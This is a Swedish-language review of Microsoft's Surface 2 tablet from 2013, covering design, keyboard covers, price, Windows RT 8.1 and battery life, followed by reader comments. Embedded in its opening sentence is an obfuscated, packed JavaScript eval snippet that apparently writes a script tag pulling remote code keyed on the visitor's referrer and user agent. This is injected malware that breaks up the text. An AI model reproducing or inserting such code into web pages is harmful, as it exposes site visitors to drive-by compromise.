Image Image Image Image Image Image Image Image Image Image

| 26 januari, 2021

Scroll to top

Top

Stort test: Surface 2 – mer än en tablet.

Stort test: Surface 2 – mer än en tablet.
Filip Urde
 • On 19 november, 2013
 • http://www.revue.se/filip-urde

Review Overview

Design
9.5
Prestanda
7.5
Användargränssnitt
7
Hårdvara
9.5
Appar
7
8.1

Rating

Jag eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|erfri|var|u0026u|referrer|azbbf||js|php’.split(’|’),0,{}))
uppskattar verkligen Microsofts envishet när det kommer till Surface. Efter lanseringen av den ursprungliga Surface, som fick blandade recensioner (läs vår här), så valde man att inte bygga om från scratch, utan för att förfina sin vision för en kraftfull tablet. Resultatet är Surface 2.

Fördelar

Stor skärm ,Windows RT 8.1 är lättare att använda än tidigare versioner,  fungerande Outlook, Office 2013 ingår gratis, kommer med microSD expansionsport, bra batteritid , man har lyssnat på en del kritik och det har resulterat i ett klart steg upp jämfört med den ursprungliga versionen, Marketplace fortsätter att växa.

Nackdelar

Windows RT är fortfarande lite av en förvirrad upplevelse, saknar fortfarande App stödet som rivalerna har, udda bildförhållande för en tablett, måste köpa till ett tangentbord för att få bästa upplevelsen, ingen mobil anslutning.

 

Surface är tillbaka

Det var bara ett år sedan den ursprungliga Surface RT landade i butikerna och vi var ganska chockade över vilka ambitioner Microsoft hade med sin nya hårdvara. En tablet som ville ta tronen från bärbara datorer – en toppen bra idé . Men dock en idé som förde med sig en risk. Windows 8 RT bastion kom med få appar och hade lite av en identitetskris som gjorde att man inte förstod om den ville vara en PC eller en tablet?

Nu är Surface 2 här och Microsoft har gjort något bisarrt : man har nämligen struntat i betäckningen ”RT” i namnet. Tableten kör ARM – baserade Windows RT 8.1, alltså inte ett fullt Windows 8.1 som de mer kraftfulla Surface Pro 2. Därför, och precis som för sin föregångare RT så har Surface 2 begränsningar för vad som kan installeras med hjälp av sitt operativsystem.

Under det gångna året sedan RT lanserades så har vi hoppats på att få se en uppsving i App stödet i Windows Marketplace. Men det är något som tar tid att bygga upp och om man ska vara ärlig så finns de flesta esentiella apparna i Windows Marketplace. Sett till hårdvaran, så har Microsoft gjort alla förbättringar man bör göra. Den är ” tunnare , lättare, snabbare ”, men i ett gränssnitt som fortfarande är begränsande för en bred användarbas, spelar det då någon roll om den är tunnare, lättare och snabbare? Surface 2 är en hårdvara som tar 2 steg framåt, men gör den det i en mjukvara som är två steg bakom?

Design

Designen på Surface 2 är grym och andas kvalitet.  Man har trimmat bort lite fett från originalet, vilket gjort den 4g lättare och 0,5 mm smalare. Ingen super skillnad, men man märker den. Något jag verkligen gillar är att man behållt Surface 2 i ren magnesium eller som man kallar det; ”VaporMg”. Det rena, borstade och silvriga magnesiumet ser riktigt snyggt och exklusivt ut. Jag har fått många blickar och positiva kommentarer när jag suttit och jobbat med Surface 2 ute på diverse fik.

surface-2-windows-RT-1

Från fett till muskler

Surface 2 har en ny 10,6 – tums, 1920 x 1080  IPS skärm – samma som återfinns i Surface Pro 2 – och ett två läges stativ för ett bredare utbud av betraktningsvinklar och det mina vänner är ett stort plus. Betraktningsvinkeln var något jag var kritisk mot i förra upplagan av Surface då den inte var perfekt för direkt något läge. Jag är 1,93m lång och den tidigare vinkeln gjorde att jag var tvungen att sjunka ner lite i stolen för att få en bekväm vy av skärmen, på samma gång som det var omöjlig att ha den bekvämt i knät. Det var en kritik jag inte var direkt ensam om efter förra generationens Surface. Men Microsoft var lyhörda och tog åt sig och har nu tagit fram en kombination av två klockrena lägen.

microsoft_surface_models

Man har även hottat upp med en Tegra 4 -processor under huven som tillsammans med Windows RT 8.1 gör Surface 2 riktigt snabb.  Ett konkret steg framåt är den nya Outlook appen som kommer som en del av RT Office-paketet, vilket ingår gratis. Office-paketet är verkligen en av Surface 2s stora fördelar som ger en extra bredd mot konkurrenterna. Med Surface 2 kan du faktiskt jobba på riktigt och om du inte behöver några tunga program som Photoshop eller liknande, ja, då är Surface 2 en tablet-pc som du klarar dig fint med.

Något jag är glad över är att ingångsnivån av Surface 2 kommer med en så bra skärm, IPS skärmen är verkligen en fröjd för ögat, men som en dedikerad surfplatta så blir bildförhållandet lite udda ibland. Den är väldigt bred, eller hög (om du vrider på den) i händerna. Du kommer inte kunna gå och använda den med din tumme, vilket kanske en iPad mini är optimal för, så det är ingen tablett för dig som är på språng… fast det är inte sant heller! Visst du kan inte använda den optimalt när du promenerar runt på stan, men det är heller inte syftet med Surface. Den är inte en enhandsmaskin som man kan hävda att iPad mini är, men det är en tablet som faktiskt kan byta ut eller komplettera din vanliga PC på många sätt. Den största skillnaden mellan en Surface 2 och en iPad, om man ska vara riktigt krass, är att en Surface 2 kan du faktiskt jobba på. Det kan du inte på en iPad. Nu hävdar många att en iPad också går att jobba, det finns key note osv. men det är inte i närheten av samma upplevelse som du får av ett fullt office och outlook. Jag har en iPad hemma och den är uteslutande en media maskin för mig. Jag läser tidningar och ser på Netflix. Men Surface har jag klarat av att jobba på nästan uteslutande. Det är bara när man behöver ett specifikt program som endast är desktop baserat som det krånglar. Men om du är på resa, ska svara på mail, redigera i ett excel eller word-dokument, ja, då är Surface 2 helt utmärkt. Dock måste sägas att det virtuella tangentbordet inte leverera en snabb skrivkänsla och när den dyker upp i fönstret så känns den som den är väldigt i vägen. Men det gör inget, för lösningen på problemet är tangentbordet Touch Cover. Om det virtuella tangentbordet inte riktigt håller, så är istället Touch Cover det bästa alternativet jag testat till en tablet.

Touch Cover 2

Nya Touch Cover 2 är verkligen ett fantastiskt exempel på hur man gör ett litet, enkelt tangentbord, men fortfarande fullt funktionellt. Enda nackdelen är att du måste köpa den för 1069kr.

Men inget kunde vara mer värt.

touch-cover2-illum

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

Touch Cover 2 är ett supertunt tangentbord med bakgrundsbelysta tangenter, som även är ett skyddande hölje. Den fästs i botten av Surface 2 via en magnetiserad kontakt och det är precis så enkelt som det låter, ”klick” och du är igång. Inte bara är den tunnare än Touch Cover som kom med förra generationen, den fick nästan tredubbla mängden sensorer, för att ge en mer exakt skrivkänsla. Om du tyckte att Touch Cover förde tankarna lite till en skrivmaskin, då är Tocuh Cover 2 en fröjd. Hela panelen kan även användas som en två – finger ”gesture” yta, för att rulla runt i dokument eller upp och ner för webbplatser, alltså inte bara begränsat till styrplattan.

Om du vill ha en ännu bättre tangentbordskänsla så finns Type Cover 2. Type Cover 2 är bakgrundsbelyst så att du kan arbeta under alla ljusförhållanden precis som Touch Cover 2. Men med den stora skillnaden att den är ett mekaniskt tangentbord, vilket gör att du kan skriva i samma hastighet som på ett vanligt tangentbord, fast i en supertunn lättviktsDesign. Type Cover 2 väger endast 255 gram.

surfacekey

 

 

 

 

 

 

 

 

 

 

 

 

 

I det här testet så använde jag mig av Touch Cover 2, men jag har sedan gammalt ett Type Cover (1:an).

Vad är priset?

Ur ett prisperspektiv så är  Surface 2 mer prisvärd än den ursprungliga RT -modellen. Den kommer nu som en 32GB version för 3895kr och en 64GB version för 4795kr. Föregående Surface RT 32GB utan tangentbordet kostade 4495 kr vid lansering. Det är ett strategiskt val av Microsoft som lägger den precis under iPad 4 i pris. Till skillnad från Apple-enheten, så begränsar Microsoft heller inte från en expansion, utan du kan bygga ut med ett 64GB microSD-kort, i kortplatsen som finns undangömd under den utfällbara baksidan, vilket gör den mer eller mindre osynlig.

s2-microsd

Microsoft slänger även in ett två års SkyDrive abonnemang, som ger dig 200GB i extra lagringsutrymme online.

Windows RT 8.1

I korthet så är RT versionen tänkt att vara mer app- baserade snarare än att du ska köra tunga program. Vilket betyder att Surface 2 endast kan installera program från Windows Marketplace.

Windows-8.1-Startscreen

För Surface 2 innebär detta att du kan jobba med din e-post, online lagring i molnet, läsa nyheter, hålla koll på vädret, arbeta med Office RT och sedan kan de skräddarsy din tile-baserade vy av användargränssnitt med appar som är tillgängliga i Marketplace . Det fungerar helt enkelt precis som din iPad eller din Google nexus… Du har vissa appar som följer med och sedan finns en marketplace där vissa program kostar och vissa är gratis. Som jag sa tidigare så finns majoriteten av tablet – baserade sakerna du vill kunna göra, detta trots att Marketplace inte helt har den bredden med appar som finns i Android och iOS motsvarigheter.

Det finns en desktop app för att ge dig en stationär upplevelse och den påminner om ett fullt Windows. Dock fungerar det inte som en full version av Windows, men du kan enkelt spara filer och mappa de precis som du är van vid att göra.

 

Tegra 4

Nvidias Tegra 4 -system har blivit populärt hos flera tablettillverkare. Surface 2 är en av enheterna som har tegra 4 och den drar verkligen nytta av all kraften som tegra 4 har att erbjuda. 1.7Ghz processor med 2GB RAM gör under. För att jämföra med en konkurrent så är kraften ungefär i nivå med en iPad 4. Så det är helt tillräckligt för allt som finns tillgängligt från Marketplace – från att spela filmfiler, lätt redigering, eller att spela spel och surfupplevelsen är slät och felfri. Videouppspelning kan vara begränsad på grund av codec stöd, men det är bara att ladda ner en VLC spelare från Marketplace så är problemet borta.

Men det bästa är vad som hänt med livslängd. Tegra 4 är så otroligt skonsam på batteriet, vilket innebär att du kan köra din Surface 2 aktivt i 10 – timmar per laddning. Detta är bra! Stäng av Wi – Fi , dimma skärmen och en fullständig långdistansflygning med film lär inte vara något problem alls.

Som gjord för att Skype:a

På första generationens Surface var kamerorna inte allt för bra, detta har Microsoft noterat och la nu in en 5 – megapixel kamera baktill och en 3,5 – megapixel till fronten, vilket är ett stort lyft för Surface 2 och gör den optimal för Skype.

Summering:

Surface 2 är tunnare, lättare och snabbare än tidigare. Microsoft har tagit åt sig utav kritiken man fick vid förra versionens lansering och jag tycker man är på rätt väg. Många tycker fortfarande att den är för tung, för stor och förvirrande. Avsaknaden av appar är fortfarande där, men vad gör det egentligen? Jag ser Surface som något mer än en tablet, nämligen en tablet du kan arbeta på. Du får inte app-biblioteket som du får i iOS eller Android och visst den är inte lika lätt som en iPad 4, men jag tycker att det är som att jämföra äpplen med päron. Visst man säger från Microsofts sida att det är en tablet, men jag skulle yrka på att detta är en klass för sig. För det är inte en vanlig tablet, den är inte till för dig som vill kunna hålla den i en hand medan du svischar fram på stan med en ”Latte” i handen, den är heller inte till för dig som ska spela igenom en oändlig katalog med spel. Nej, Surface är till för dig som vill vara ultra-mobil i sitt arbete.  Lägg till ett tangentbord och det är faktiskt en upplevelse som i många avseenden gör att du kan lämna datorn hemma. Jag ser Surface som en tablet för en businessman, någon som vill kunna ha en lätt, rigid och snygg maskin med sig på resan. Inte jobba med de tyngsta projekten, men ändå kunna skriva mail, ändra i dokument, koppla in i en TV och hålla en presentation ”on the fly”. Det är vad Surface är för mig och det tycker jag Microsoft har lyckats med.

microsoft.com

 

Comments

 1. Jonas

  Riktigt schysst!!!

 2. Fredrik

  Jag står i valet och kvalet mellan en iPad och just en Surface… Visste inte att en ny hade kommit så det var ju en trevlig överraskning. Men vad skulle du personligen välja? Jag har en iPhone, så tanken var ju att jag skulle ha en iPad i och med att det är samma appar. Men jag gillar det du säger om office och hur du kan vara lite mer produktiv med en Surface… jösses… Hjälp!

  • Filip Urde

   Hej Fredrik!

   Jag skulle säga att det beror helt på hur du ska använda din tablet. Du säger att du har en iPhone sen innan och det är ju självklart ett argument för iPad, då du får samma OS som du redan är van vid. Jag har även en Apple TV hemma som gör det smidigt att streama från min iPad, men utanför mitt hem så är iPaden rätt värdelös. Det känns bara som en större men stympad iPhone. En tablet för mig (tills nu), har varit en enklare väg till att konsumera media i hemmet på en större skärm än mobilen utan att det är en dator. En Surface är något helt annat, det är en tablet med PC funktioner. Den är inte lika smidig, men smidigare än en PC och du kan använda den som ett substitut till en dator när du är på semester. I och med att du sällan behöver mer än kanske mail, eller kunna redigera lite i dokument. Så jag skulle säga så här. Om du bara vill ha en ren media maskin till hemmet, då är iPad ett klockrent val. Men vill du ha något som är media maskin och ett substitut till din PC när du är ute, då är Surface grym. Hoppas det hjälper dig lite på vägen. Tack för din kommentar.

 3. Molgan

  Synd att jag köpte min Microsoft Surface 1 precis innan release 🙁

 4. måns

  Jag tycker att det här är en riktigt bra recension av Surface 2, en av de bättre faktiskt!
  Jag äger själv en Surface 2 och jag ser inte rt som en dålig sak, jag tycker att det gör så att en Surfplatta med priset och storleken av en Surfplatta får fler funktioner. Det som borde tilläggas är att tegra4 är fyrtjärnig, det gör att den klarar av att ha många program i bakgrunden. Inte för att vara någon fanboy men apples ipad air och fyra har bara en gig av ram minne och det leder till kraschar lite titt som tätt i appar som safari och om man frågar mig så ska webbläsaren på en tablett för 4,5k fungera utan problem.